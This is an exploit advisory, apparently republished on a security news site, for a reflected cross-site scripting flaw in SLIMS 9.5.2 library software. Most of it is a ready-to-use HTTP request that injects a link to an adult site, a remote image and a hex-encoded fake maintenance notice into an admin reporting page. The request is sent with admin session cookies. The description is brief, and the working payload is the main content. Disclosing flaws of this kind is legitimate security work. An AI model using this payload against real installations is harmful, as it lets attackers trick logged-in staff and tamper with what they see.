Exploit/Advisories no image

Published on January 19th, 2023 📆 | 2939 Views ⚑

0

SLIMS 9.5.2 Cross Site Scripting – Torchsec


https://www.ispeech.org

## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit
## Development: nu11secur1ty
## Date: 01.19.2023
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2

## Description:
The value of manual insertion `point 3` is copied into the HTML
document as plain text between tags.
The payload udz21rk346 was submitted in
manual insertion point 3.
This input was echoed unmodified in the application's response.
The attacker can trick the already logged-in user, to visit the
exploit link that this attacker is created,
and if this already logged-in user is not actually IT or admin, this
will be the end of this system.

## STATUS: HIGH Vulnerability

[+] Exploit:
```
GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27
HTTP/1.1
Host: pwnedhost1.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;
SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4
Connection: close
```





## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)

## Proof and Exploit:
[href](https://streamable.com/zd6e18)

## Reference:
[href](https://portswigger.net/web-security/cross-site-scripting)

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑